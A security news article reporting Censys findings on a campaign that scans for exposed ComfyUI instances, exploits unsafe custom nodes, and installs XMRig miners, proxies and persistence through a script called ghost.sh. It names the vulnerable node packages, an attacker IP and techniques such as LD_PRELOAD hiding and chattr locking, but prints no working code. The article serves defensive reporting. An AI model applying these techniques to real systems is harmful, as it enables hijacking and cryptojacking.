Back to News
Cyber Attack

Over 1,000 Exposed ComfyUI Instances Hijacked for Cryptomining and Proxy Botnet

CyberSecurityWaala 4 days ago Apr 7, 2026
Over 1,000 Exposed ComfyUI Instances Hijacked for Cryptomining and Proxy Botnet

Security researchers at Censys have uncovered an active campaign that targets internet‑exposed ComfyUI instances to build a cryptomining and proxy botnet. The campaign uses automated tooling to find misconfigured deployments, gain remote code execution, and install miners and proxy software.

How the attackers work

“A purpose-built Python scanner continuously sweeps major cloud IP ranges for vulnerable targets,” Mark Ellzey, a Censys security researcher, wrote in the report. The scanner searches for publicly-accessible ComfyUI services, probes for unsafe custom nodes that accept raw Python, and then weaponizes those nodes to run attacker code. This entire attack chain follows a classic cyber kill chain model, starting with reconnaissance and moving to exploitation and installation.

Censys said the malicious chain leverages both preexisting risky node families and an installer path through ComfyUI-Manager. “If none of the target nodes are present, the scanner checks whether ComfyUI-Manager is installed,” Censys explained. “If available, it installs a vulnerable node package itself, then retries exploitation.”

Researchers at Snyk documented parts of this attack surface in December 2024, showing that some custom node families accept raw Python and execute it without authentication. Censys named specific node families the campaign looks for, including Vova75Rus/ComfyUI-Shell-Executor, filliptm/ComfyUI_Fill-Nodes, seanlynch/srl-nodes, and ruiqutech/ComfyUI-RuiquNodes.

Tools and payloads

Censys found an open directory on 77.110.96.200, an IP linked to Aeza Group, a bulletproof hosting provider. That directory contained reconnaissance scripts, a scanner/exploitation framework, and a malicious package the attackers use to fetch a next-stage shell script called ghost.sh.

Once code execution is achieved, ghost.sh performs several actions. Censys said it disables shell history, kills competing miners, deploys mining binaries, and installs persistence. The script uses an LD_PRELOAD technique to hide a watchdog process that revives the miner if it is terminated. It also copies the miner to multiple locations and uses the chattr +i command to lock binaries so they cannot be deleted or modified easily.

The campaign runs XMRig to mine Monero and uses lolMiner to mine Conflux. In addition, the attackers install Hysteria V2 and run a Flask-based command-and-control panel to manage infected nodes and to sell them as proxies, Censys said.

Censys also found code that targets a competing mining botnet known as Hisana. “Rather than just killing it, ghost.sh overwrites its configuration to redirect Hisana’s mining output to its own wallet address,” Censys wrote, and then occupies Hisana’s C2 port so the competitor cannot restart.

Scale and persistence

Attack surface management platforms show more than 1,000 publicly-accessible ComfyUI instances, according to Censys. That number is small compared with some internet services, but it is enough for an opportunistic operator to turn a tidy profit.

Censys also noted the scanner supports persistence by downloading ghost.sh every six hours and reapplying the exploit when ComfyUI restarts. The campaign includes cleanup steps such as clearing ComfyUI prompt history to remove traces of the attack.

Context and broader activity

Security watchers have seen a rise in botnet campaigns across exposed internet services. Pulsedive reported increases in bot and node activity over recent six‑month periods, and QiAnXin XLab documented a separate campaign that implants a DDoS backdoor called NetDragon on vulnerable NAS devices and tampers with update domains to block patches.

“Much of the tooling in this repository appears hastily assembled, and the overall tactics and techniques might initially suggest unsophisticated activity,” Censys said. “The operator identifies exposed ComfyUI instances running custom nodes, determines which of those nodes expose unsafe functionality, and then uses them as a pathway to remote code execution. Understanding the difference between a threat, vulnerability, and risk is key to analyzing this type of attack.

The takeaway is simple. Publicly exposed, unauthenticated developer services are prime targets. ComfyUI users should restrict access, remove unsafe custom nodes, and update deployments. Organizations should scan their cloud ranges for accidental exposures and apply authentication and network controls.

For now, Censys, Snyk, Pulsedive, and QiAnXin XLab are tracking the activity and publishing indicators. Administrators should treat their findings as actionable intelligence.

#ComfyUI #Cryptojacking #Botnet #CyberSecurity #CloudSecurity #ThreatIntel